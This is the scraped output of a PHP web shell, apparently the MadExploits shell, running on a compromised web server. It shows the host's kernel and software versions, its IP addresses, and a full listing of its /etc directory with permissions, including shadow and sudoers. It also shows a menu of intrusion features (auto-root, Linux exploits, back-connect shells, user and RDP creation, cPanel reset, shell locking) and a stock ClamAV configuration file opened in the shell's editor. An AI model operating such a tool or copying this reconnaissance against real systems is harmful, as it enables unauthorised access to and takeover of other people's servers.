Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
ImageMagick-6
[ DIR ]
drwxr-xr-x
NetworkManager
[ DIR ]
drwxr-xr-x
X11
[ DIR ]
drwxr-xr-x
alternatives
[ DIR ]
drwxr-xr-x
amavisd
[ DIR ]
drwxr-xr-x
audisp
[ DIR ]
drwxr-x---
audit
[ DIR ]
drwxr-x---
bash_completion.d
[ DIR ]
drwxr-xr-x
binfmt.d
[ DIR ]
drwxr-xr-x
cbpolicyd
[ DIR ]
drwxr-xr-x
cgconfig.d
[ DIR ]
drwxr-xr-x
cgconfigold
[ DIR ]
drwxr-xr-x
chkconfig.d
[ DIR ]
drwxr-xr-x
clamd.d
[ DIR ]
drwxr-xr-x
cron.d
[ DIR ]
drwxr-xr-x
cron.daily
[ DIR ]
drwxr-xr-x
cron.hourly
[ DIR ]
drwxr-xr-x
cron.monthly
[ DIR ]
drwxr-xr-x
cron.weekly
[ DIR ]
drwxr-xr-x
csf
[ DIR ]
drw-------
dbus-1
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
depmod.d
[ DIR ]
drwxr-xr-x
dhcp
[ DIR ]
drwxr-x---
dovecot
[ DIR ]
drwxr-xr-x
dracut.conf.d
[ DIR ]
drwxr-xr-x
egl
[ DIR ]
drwxr-xr-x
firewalld
[ DIR ]
drwxr-x---
fonts
[ DIR ]
drwxr-xr-x
gcrypt
[ DIR ]
drwxr-xr-x
ghostscript
[ DIR ]
drwxr-xr-x
glvnd
[ DIR ]
drwxr-xr-x
gnupg
[ DIR ]
drwxr-xr-x
goaccess
[ DIR ]
drwxr-xr-x
groff
[ DIR ]
drwxr-xr-x
grub.d
[ DIR ]
drwx------
gss
[ DIR ]
drwxr-xr-x
httpd
[ DIR ]
drwxr-xr-x
init.d
[ DIR ]
drwxr-xr-x
iproute2
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
krb5.conf.d
[ DIR ]
drwxr-xr-x
ld.so.conf.d
[ DIR ]
drwxr-xr-x
libnl
[ DIR ]
drwxr-xr-x
libpaper.d
[ DIR ]
drwxr-xr-x
logrotate.d
[ DIR ]
drwxr-xr-x
lynis
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
modprobe.d
[ DIR ]
drwxr-xr-x
modules-load.d
[ DIR ]
drwxr-xr-x
my.cnf.d
[ DIR ]
drwxr-xr-x
named
[ DIR ]
drwxr-x---
nginx
[ DIR ]
drwxr-xr-x
opendkim
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
opt
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
pkcs11
[ DIR ]
drwxr-xr-x
pki
[ DIR ]
drwxr-xr-x
plymouth
[ DIR ]
drwxr-xr-x
pm
[ DIR ]
drwxr-xr-x
polkit-1
[ DIR ]
drwxr-xr-x
popt.d
[ DIR ]
drwxr-xr-x
portreserve
[ DIR ]
drwxr-xr-x
postfix
[ DIR ]
drwxr-xr-x
ppp
[ DIR ]
drwxr-xr-x
prelink.conf.d
[ DIR ]
drwxr-xr-x
profile.d
[ DIR ]
drwxr-xr-x
pure-ftpd
[ DIR ]
drwxr-xr-x
python
[ DIR ]
drwxr-xr-x
python-policyd-spf
[ DIR ]
drwxr-xr-x
qemu-ga
[ DIR ]
drwxr-xr-x
rc.d
[ DIR ]
drwxr-xr-x
rc0.d
[ DIR ]
drwxr-xr-x
rc1.d
[ DIR ]
drwxr-xr-x
rc2.d
[ DIR ]
drwxr-xr-x
rc3.d
[ DIR ]
drwxr-xr-x
rc4.d
[ DIR ]
drwxr-xr-x
rc5.d
[ DIR ]
drwxr-xr-x
rc6.d
[ DIR ]
drwxr-xr-x
redis
[ DIR ]
drwxr-x---
rpm
[ DIR ]
drwxr-xr-x
rsyslog.d
[ DIR ]
drwxr-xr-x
rwtab.d
[ DIR ]
drwxr-xr-x
sasl2
[ DIR ]
drwxr-xr-x
security
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
skel
[ DIR ]
drwxr-xr-x
snmp
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
statetab.d
[ DIR ]
drwxr-xr-x
subversion
[ DIR ]
drwxr-xr-x
sudoers.d
[ DIR ]
drwxr-x---
sysconfig
[ DIR ]
drwxr-xr-x
sysctl.d
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
tmpfiles.d
[ DIR ]
drwxr-xr-x
tuned
[ DIR ]
drwxr-xr-x
udev
[ DIR ]
drwxr-xr-x
varnish
[ DIR ]
drwxr-xr-x
wpa_supplicant
[ DIR ]
drwxr-xr-x
xdg
[ DIR ]
drwxr-xr-x
xinetd.d
[ DIR ]
drwxr-xr-x
yum
[ DIR ]
drwxr-xr-x
yum.repos.d
[ DIR ]
drwxr-xr-x
.pwd.lock
0
B
-rw-------
.updated
163
B
-rw-r--r--
DIR_COLORS
4.97
KB
-rw-r--r--
DIR_COLORS.256color
5.59
KB
-rw-r--r--
DIR_COLORS.lightbgcolor
4.56
KB
-rw-r--r--
GREP_COLORS
94
B
-rw-r--r--
GeoIP.conf
1.66
KB
-rw-r--r--
adjtime
18
B
-rw-r--r--
aliases
1.49
KB
-rw-r--r--
aliases.db
12
KB
-rw-r--r--
amavisd.conf
35.57
KB
-rw-r--r--
anacrontab
541
B
-rw-------
asound.conf
55
B
-rw-r--r--
at.deny
1
B
-rw-r--r--
bashrc
2.79
KB
-rw-r--r--
bashrce
2.79
KB
-rw-r--r--
centos-release
37
B
-rw-r--r--
centos-release-upstream
51
B
-rw-r--r--
cgconfig.conf.bak
676
B
-rw-r--r--
cgconfig.conf.rpmsave
739
B
-rw-r--r--
cgrules.conf.rpmsave
362
B
-rw-r--r--
chrony.conf
1.08
KB
-rw-r--r--
chrony.keys
481
B
-rw-r-----
clamd.conf
18.37
KB
-rw-r--r--
cron.deny
0
B
-rw-------
crontab
451
B
-rw-r--r--
crypttab
0
B
-rw-------
csh.cshrc
1.58
KB
-rw-r--r--
csh.login
1.08
KB
-rw-r--r--
dracut.conf
1.25
KB
-rw-r--r--
e2fsck.conf
112
B
-rw-r--r--
environment
0
B
-rw-r--r--
ethertypes
1.29
KB
-rw-r--r--
exports
0
B
-rw-r--r--
favicon.png
1.05
KB
-rw-r--r--
filesystems
70
B
-rw-r--r--
freshclam.conf
7.03
KB
-rw-------
fstab
390
B
-rw-r--r--
fstab.backup
423
B
-rw-r--r--
fstabe
423
B
-rw-r--r--
goaccess.conf
19.18
KB
-rw-r--r--
group
1.39
KB
-rw-r--r--
group-
1.38
KB
-rw-r--r--
gshadow
1.11
KB
----------
gshadow-
1.11
KB
----------
host.conf
9
B
-rw-r--r--
hostname
25
B
-rw-r--r--
hosts
168
B
-rw-r--r--
hosts.allow
370
B
-rw-r--r--
hosts.deny
460
B
-rw-r--r--
hosts_backup_2022-11-18_01-07-...
224
B
-rw-r--r--
hosts_backup_2025-11-17_14-49-...
168
B
-rw-r--r--
inittab
511
B
-rw-r--r--
inputrc
942
B
-rw-r--r--
issue
23
B
-rw-r--r--
issue.net
22
B
-rw-r--r--
kdump.conf
7.1
KB
-rw-r--r--
krb5.conf
646
B
-rw-r--r--
ld.so.cache
45.43
KB
-rw-r--r--
ld.so.conf
28
B
-rw-r--r--
libaudit.conf
191
B
-rw-r-----
libuser.conf
2.33
KB
-rw-r--r--
locale.conf
19
B
-rw-r--r--
localtime
286
B
-rw-r--r--
localtime.bak
384
B
-rw-r--r--
login.defs
1.98
KB
-rw-r--r--
logrotate.conf
662
B
-rw-r--r--
machine-id
33
B
-rw-r--r--
magic
111
B
-rw-r--r--
mail.rc
1.92
KB
-rw-r--r--
mailcap
272
B
-rw-r--r--
mailname
29
B
-rw-r--r--
makedumpfile.conf.sample
5
KB
-rw-r--r--
man_db.conf
5.05
KB
-rw-r--r--
mime.types
50.57
KB
-rw-r--r--
mke2fs.conf
1.08
KB
-rw-r--r--
motd
782
B
-rw-r--r--
mtab
0
B
-r--r--r--
my.cnf
193
B
-rw-r--r--
named.conf
6.5
KB
-rw-r-----
named.conf_bkp_2022-11-19_05:1...
3.02
KB
-rw-r-----
named.conf_bkp_2022-11-20_04:1...
3.02
KB
-rw-r-----
named.conf_bkp_2022-11-20_04:1...
2.88
KB
-rw-r-----
named.conf_bkp_2022-11-20_04:1...
2.88
KB
-rw-r-----
named.conf_bkp_2022-11-20_04:1...
2.88
KB
-rw-r-----
named.conf_bkp_2022-11-20_04:1...
2.88
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.16
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2022-11-27_08:1...
3.01
KB
-rw-r-----
named.conf_bkp_2025-01-01_08:0...
6.01
KB
-rw-r-----
named.conf_bkp_2025-01-01_08:0...
5.88
KB
-rw-r-----
named.conf_bkp_2025-01-01_08:0...
6.31
KB
-rw-r-----
named.conf_bkp_2025-01-01_08:0...
6.18
KB
-rw-r-----
named.conf_bkp_2025-01-01_08:0...
6.18
KB
-rw-r-----
named.iscdlv.key
3.83
KB
-rw-r--r--
named.rfc1912.zones
931
B
-rw-r-----
named.root.key
1.84
KB
-rw-r--r--
nanorc
8.68
KB
-rw-r--r--
netconfig
767
B
-rw-r--r--
networks
58
B
-rw-r--r--
nsswitch.conf
1.9
KB
-rw-r--r--
opendkim.conf
673
B
-rw-r--r--
opendkim.conf_backup
673
B
-rw-r--r--
os-release
393
B
-rw-r--r--
papersize
68
B
-rw-r--r--
passwd
3.61
KB
-rw-r--r--
passwd-
3.61
KB
-rw-r--r--
printcap
233
B
-rw-r--r--
profile
1.78
KB
-rw-r--r--
protocols
6.39
KB
-rw-r--r--
rc.local
589
B
-rwxr-xr-x
rearj.cfg
373
B
-rw-r--r--
redhat-release
37
B
-rw-r--r--
resolv.conf
65
B
-rw-r--r--
rhashrc
523
B
-rw-r--r--
rkhunter.conf
50.63
KB
-rw-r-----
rndc.key
100
B
-rw-r-----
rpc
1.6
KB
-rw-r--r--
rsyncd.conf
458
B
-rw-r--r--
rsyslog.conf
3.16
KB
-rw-r--r--
rwtab
1008
B
-rw-r--r--
screenrc
6.56
KB
-rw-r--r--
securetty
221
B
-rw-------
services
654.58
KB
-rw-r--r--
sestatus.conf
216
B
-rw-r--r--
shadow
4.76
KB
----------
shadow-
4.76
KB
----------
shells
58
B
-rw-r--r--
statetab
212
B
-rw-r--r--
subgid
667
B
-rw-r--r--
subgid-
645
B
-rw-r--r--
subuid
667
B
-rw-r--r--
subuid-
645
B
-rw-r--r--
sudo-ldap.conf
3.11
KB
-rw-r-----
sudo.conf
1.74
KB
-rw-r-----
sudoers
4.23
KB
-r--r-----
sysctl.conf
530
B
-rw-r--r--
system-release
37
B
-rw-r--r--
system-release-cpe
23
B
-rw-r--r--
tcsd.conf
6.88
KB
-rw-------
trusted-key.key
750
B
-rw-r--r--
updatedb.conf
557
B
-rw-r--r--
vconsole.conf
37
B
-rw-r--r--
virc
1.94
KB
-rw-r--r--
wgetrc
4.37
KB
-rw-r--r--
yum.conf
970
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clamd.conf
## ## Example config file for the Clam AV daemon ## Please read the clamd.conf(5) manual before editing this file. ## # Comment or remove the line below. #Example # Uncomment this option to enable logging. # LogFile must be writable for the user running daemon. # A full path is required. # Default: disabled LogFile /var/log/clamav/clamd.log # By default the log file is locked for writing - the lock protects against # running clamd multiple times (if want to run another clamd, please # copy the configuration file, change the LogFile variable, and run # the daemon with --config-file option). # This option disables log file locking. # Default: no #LogFileUnlock yes # Maximum size of the log file. # Value of 0 disables the limit. # You may use 'M' or 'm' for megabytes (1M = 1m = 1048576 bytes) # and 'K' or 'k' for kilobytes (1K = 1k = 1024 bytes). To specify the size # in bytes just don't use modifiers. If LogFileMaxSize is enabled, log # rotation (the LogRotate option) will always be enabled. # Default: 1M LogFileMaxSize 0 # Log time with each message. # Default: no LogTime yes # Also log clean files. Useful in debugging but drastically increases the # log size. # Default: no #LogClean yes # Use system logger (can work together with LogFile). # Default: no LogSyslog yes # Specify the type of syslog messages - please refer to 'man syslog' # for facility names. # Default: LOG_LOCAL6 #LogFacility LOG_MAIL # Enable verbose logging. # Default: no #LogVerbose yes # Enable log rotation. Always enabled when LogFileMaxSize is enabled. # Default: no #LogRotate yes # Log additional information about the infected file, such as its # size and hash, together with the virus name. #ExtendedDetectionInfo yes # This option allows you to save a process identifier of the listening # daemon (main thread). # Default: disabled PidFile /var/run/clamav/clamd.pid # Optional path to the global temporary directory. # Default: system specific (usually /tmp or /var/tmp). TemporaryDirectory /var/tmp # Path to the database directory. # Default: hardcoded (depends on installation options) DatabaseDirectory /var/lib/clamav # Only load the official signatures published by the ClamAV project. # Default: no #OfficialDatabaseOnly no # The daemon can work in local mode, network mode or both. # Due to security reasons we recommend the local mode. # Path to a local socket file the daemon will listen on. # Default: disabled (must be specified by a user) LocalSocket /var/run/clamav/clamd.sock # Sets the group ownership on the unix socket. # Default: disabled (the primary group of the user running clamd) #LocalSocketGroup virusgroup # Sets the permissions on the unix socket to the specified mode. # Default: disabled (socket is world accessible) #LocalSocketMode 660 # Remove stale socket after unclean shutdown. # Default: yes FixStaleSocket yes # TCP port address. # Default: no TCPSocket 3310 # TCP address. # By default we bind to INADDR_ANY, probably not wise. # Enable the following to provide some degree of protection # from the outside world. This option can be specified multiple # times if you want to listen on multiple IPs. IPv6 is now supported. # Default: no TCPAddr 127.0.0.1 # Maximum length the queue of pending connections may grow to. # Default: 200 MaxConnectionQueueLength 50 # Clamd uses FTP-like protocol to receive data from remote clients. # If you are using clamav-milter to balance load between remote clamd daemons # on firewall servers you may need to tune the options below. # Close the connection when the data size limit is exceeded. # The value should match your MTA's limit for a maximum attachment size. # Default: 25M #StreamMaxLength 10M # Limit port range. # Default: 1024 #StreamMinPort 30000 # Default: 2048 #StreamMaxPort 32000 # Maximum number of threads running at the same time. # Default: 10 MaxThreads 50 # Waiting for data from a client socket will timeout after this time (seconds). # Default: 120 ReadTimeout 300 # This option specifies the time (in seconds) after which clamd should # timeout if a client doesn't provide any initial command after connecting. # Default: 5 #CommandReadTimeout 5 # This option specifies how long to wait (in miliseconds) if the send buffer is full. # Keep this value low to prevent clamd hanging # # Default: 500 #SendBufTimeout 200 # Maximum number of queued items (including those being processed by MaxThreads threads) # It is recommended to have this value at least twice MaxThreads if possible. # WARNING: you shouldn't increase this too much to avoid running out of file descriptors, # the following condition should hold: # MaxThreads*MaxRecursion + (MaxQueue - MaxThreads) + 6< RLIMIT_NOFILE (usual max is 1024) # # Default: 100 #MaxQueue 200 # Waiting for a new job will timeout after this time (seconds). # Default: 30 #IdleTimeout 60 # Don't scan files and directories matching regex # This directive can be used multiple times # Default: scan all #ExcludePath ^/proc/ #ExcludePath ^/sys/ # Maximum depth directories are scanned at. # Default: 15 #MaxDirectoryRecursion 20 # Follow directory symlinks. # Default: no #FollowDirectorySymlinks yes # Follow regular file symlinks. # Default: no #FollowFileSymlinks yes # Scan files and directories on other filesystems. # Default: yes #CrossFilesystems yes # Perform a database check. # Default: 600 (10 min) #SelfCheck 600 # Execute a command when virus is found. In the command string %v will # be replaced with the virus name. # Default: no #VirusEvent /usr/local/bin/send_sms 123456789 "VIRUS ALERT: %v" # Run as another user (clamd must be started by root for this option to work) # Default: don't drop privileges User clam # Initialize supplementary group access (clamd must be started by root). # Default: no AllowSupplementaryGroups yes # Stop daemon when libclamav reports out of memory condition. #ExitOnOOM yes # Don't fork into background. # Default: no #Foreground yes # Enable debug messages in libclamav. # Default: no #Debug yes # Do not remove temporary files (for debug purposes). # Default: no #LeaveTemporaryFiles yes # Permit use of the ALLMATCHSCAN command. If set to no, clamd will reject # any ALLMATCHSCAN command as invalid. # Default: yes #AllowAllMatchScan no # Detect Possibly Unwanted Applications. # Default: no #DetectPUA yes # Exclude a specific PUA category. This directive can be used multiple times. # See https://github.com/vrtadmin/clamav-faq/blob/master/faq/faq-pua.md for # the complete list of PUA categories. # Default: Load all categories (if DetectPUA is activated) #ExcludePUA NetTool #ExcludePUA PWTool # Only include a specific PUA category. This directive can be used multiple # times. # Default: Load all categories (if DetectPUA is activated) #IncludePUA Spy #IncludePUA Scanner #IncludePUA RAT # In some cases (eg. complex malware, exploits in graphic files, and others), # ClamAV uses special algorithms to provide accurate detection. This option # controls the algorithmic detection. # Default: yes #AlgorithmicDetection yes # This option causes memory or nested map scans to dump the content to disk. # If you turn on this option, more data is written to disk and is available # when the LeaveTemporaryFiles option is enabled. #ForceToDisk yes # This option allows you to disable the caching feature of the engine. By # default, the engine will store an MD5 in a cache of any files that are # not flagged as virus or that hit limits checks. Disabling the cache will # have a negative performance impact on large scans. # Default: no #DisableCache yes ## ## Executable files ## # PE stands for Portable Executable - it's an executable file format used # in all 32 and 64-bit versions of Windows operating systems. This option allows # ClamAV to perform a deeper analysis of executable files and it's also # required for decompression of popular executable packers such as UPX, FSG, # and Petite. If you turn off this option, the original files will still be # scanned, but without additional processing. # Default: yes ScanPE yes # Certain PE files contain an authenticode signature. By default, we check # the signature chain in the PE file against a database of trusted and # revoked certificates if the file being scanned is marked as a virus. # If any certificate in the chain validates against any trusted root, but # does not match any revoked certificate, the file is marked as whitelisted. # If the file does match a revoked certificate, the file is marked as virus. # The following setting completely turns off authenticode verification. # Default: no #DisableCertCheck yes # Executable and Linking Format is a standard format for UN*X executables. # This option allows you to control the scanning of ELF files. # If you turn off this option, the original files will still be scanned, but # without additional processing. # Default: yes ScanELF yes # With this option clamav will try to detect broken executables (both PE and # ELF) and mark them as Broken.Executable. # Default: no DetectBrokenExecutables yes ## ## Documents ## # This option enables scanning of OLE2 files, such as Microsoft Office # documents and .msi files. # If you turn off this option, the original files will still be scanned, but # without additional processing. # Default: yes ScanOLE2 yes # With this option enabled OLE2 files with VBA macros, which were not # detected by signatures will be marked as "Heuristics.OLE2.ContainsMacros". # Default: no #OLE2BlockMacros no # This option enables scanning within PDF files. # If you turn off this option, the original files will still be scanned, but # without decoding and additional processing. # Default: yes ScanPDF yes # This option enables scanning within SWF files. # If you turn off this option, the original files will still be scanned, but # without decoding and additional processing. # Default: yes #ScanSWF yes ## ## Mail files ## # Enable internal e-mail scanner. # If you turn off this option, the original files will still be scanned, but # without parsing individual messages/attachments. # Default: yes ScanMail yes # Scan RFC1341 messages split over many emails. # You will need to periodically clean up $TemporaryDirectory/clamav-partial directory. # WARNING: This option may open your system to a DoS attack. # Never use it on loaded servers. # Default: no #ScanPartialMessages yes # With this option enabled ClamAV will try to detect phishing attempts by using # signatures. # Default: yes #PhishingSignatures yes # Scan URLs found in mails for phishing attempts using heuristics. # Default: yes #PhishingScanURLs yes # Always block SSL mismatches in URLs, even if the URL isn't in the database. # This can lead to false positives. # # Default: no #PhishingAlwaysBlockSSLMismatch no # Always block cloaked URLs, even if URL isn't in database. # This can lead to false positives. # # Default: no #PhishingAlwaysBlockCloak no # Detect partition intersections in raw disk images using heuristics. # Default: no #PartitionIntersection no # Allow heuristic match to take precedence. # When enabled, if a heuristic scan (such as phishingScan) detects # a possible virus/phish it will stop scan immediately. Recommended, saves CPU # scan-time. # When disabled, virus/phish detected by heuristic scans will be reported only at # the end of a scan. If an archive contains both a heuristically detected # virus/phish, and a real malware, the real malware will be reported # # Keep this disabled if you intend to handle "*.Heuristics.*" viruses # differently from "real" malware. # If a non-heuristically-detected virus (signature-based) is found first, # the scan is interrupted immediately, regardless of this config option. # # Default: no #HeuristicScanPrecedence yes ## ## Data Loss Prevention (DLP) ## # Enable the DLP module # Default: No #StructuredDataDetection yes # This option sets the lowest number of Credit Card numbers found in a file # to generate a detect. # Default: 3 #StructuredMinCreditCardCount 5 # This option sets the lowest number of Social Security Numbers found # in a file to generate a detect. # Default: 3 #StructuredMinSSNCount 5 # With this option enabled the DLP module will search for valid # SSNs formatted as xxx-yy-zzzz # Default: yes #StructuredSSNFormatNormal yes # With this option enabled the DLP module will search for valid # SSNs formatted as xxxyyzzzz # Default: no #StructuredSSNFormatStripped yes ## ## HTML ## # Perform HTML normalisation and decryption of MS Script Encoder code. # Default: yes # If you turn off this option, the original files will still be scanned, but # without additional processing. #ScanHTML yes ## ## Archives ## # ClamAV can scan within archives and compressed files. # If you turn off this option, the original files will still be scanned, but # without unpacking and additional processing. # Default: yes ScanArchive yes # Mark encrypted archives as viruses (Encrypted.Zip, Encrypted.RAR). # Default: no ArchiveBlockEncrypted no ## ## Limits ## # The options below protect your system against Denial of Service attacks # using archive bombs. # This option sets the maximum amount of data to be scanned for each input file. # Archives and other containers are recursively extracted and scanned up to this # value. # Value of 0 disables the limit # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 100M #MaxScanSize 150M # Files larger than this limit won't be scanned. Affects the input file itself # as well as files contained inside it (when the input file is an archive, a # document or some other kind of container). # Value of 0 disables the limit. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 25M #MaxFileSize 30M # Nested archives are scanned recursively, e.g. if a Zip archive contains a RAR # file, all files within it will also be scanned. This options specifies how # deeply the process should be continued. # Note: setting this limit too high may result in severe damage to the system. # Default: 16 #MaxRecursion 10 # Number of files to be scanned within an archive, a document, or any other # container file. # Value of 0 disables the limit. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 10000 #MaxFiles 15000 # Maximum size of a file to check for embedded PE. Files larger than this value # will skip the additional analysis step. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 10M #MaxEmbeddedPE 10M # Maximum size of a HTML file to normalize. HTML files larger than this value # will not be normalized or scanned. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 10M #MaxHTMLNormalize 10M # Maximum size of a normalized HTML file to scan. HTML files larger than this # value after normalization will not be scanned. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 2M #MaxHTMLNoTags 2M # Maximum size of a script file to normalize. Script content larger than this # value will not be normalized or scanned. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 5M #MaxScriptNormalize 5M # Maximum size of a ZIP file to reanalyze type recognition. ZIP files larger # than this value will skip the step to potentially reanalyze as PE. # Note: disabling this limit or setting it too high may result in severe damage # to the system. # Default: 1M #MaxZipTypeRcg 1M # This option sets the maximum number of partitions of a raw disk image to be scanned. # Raw disk images with more partitions than this value will have up to the value number # partitions scanned. Negative values are not allowed. # Note: setting this limit too high may result in severe damage or impact performance. # Default: 50 #MaxPartitions 128 # This option sets the maximum number of icons within a PE to be scanned. # PE files with more icons than this value will have up to the value number icons scanned. # Negative values are not allowed. # WARNING: setting this limit too high may result in severe damage or impact performance. # Default: 100 #MaxIconsPE 200 ## ## On-access Scan Settings ## # Enable on-access scanning. Currently, this is supported via fanotify. # Clamuko/Dazuko support has been deprecated. # Default: no #ScanOnAccess yes # Don't scan files larger than OnAccessMaxFileSize # Value of 0 disables the limit. # Default: 5M #OnAccessMaxFileSize 10M # Set the include paths (all files inside them will be scanned). You can have # multiple OnAccessIncludePath directives but each directory must be added # in a separate line. (On-access scan only) # Default: disabled #OnAccessIncludePath /home #OnAccessIncludePath /students # Set the exclude paths. All subdirectories are also excluded. # (On-access scan only) # Default: disabled #OnAccessExcludePath /home/bofh # With this option you can whitelist specific UIDs. Processes with these UIDs # will be able to access all files. # This option can be used multiple times (one per line). # Default: disabled #OnAccessExcludeUID 0 ## ## Bytecode ## # With this option enabled ClamAV will load bytecode from the database. # It is highly recommended you keep this option on, otherwise you'll miss detections for many new viruses. # Default: yes #Bytecode yes # Set bytecode security level. # Possible values: # None - no security at all, meant for debugging. DO NOT USE THIS ON PRODUCTION SYSTEMS # This value is only available if clamav was built with --enable-debug! # TrustSigned - trust bytecode loaded from signed .c[lv]d files, # insert runtime safety checks for bytecode loaded from other sources # Paranoid - don't trust any bytecode, insert runtime checks for all # Recommended: TrustSigned, because bytecode in .cvd files already has these checks # Note that by default only signed bytecode is loaded, currently you can only # load unsigned bytecode in --enable-debug mode. # # Default: TrustSigned #BytecodeSecurity TrustSigned # Set bytecode timeout in miliseconds. # # Default: 5000 # BytecodeTimeout 1000 ## ## Statistics gathering and submitting ## # Enable statistical reporting. # Default: no #StatsEnabled yes # Disable submission of individual PE sections for files flagged as malware. # Default: no #StatsPEDisabled yes # HostID in the form of an UUID to use when submitting statistical information. # Default: auto #StatsHostID auto # Time in seconds to wait for the stats server to come back with a response # Default: 10 #StatsTimeout 10
Close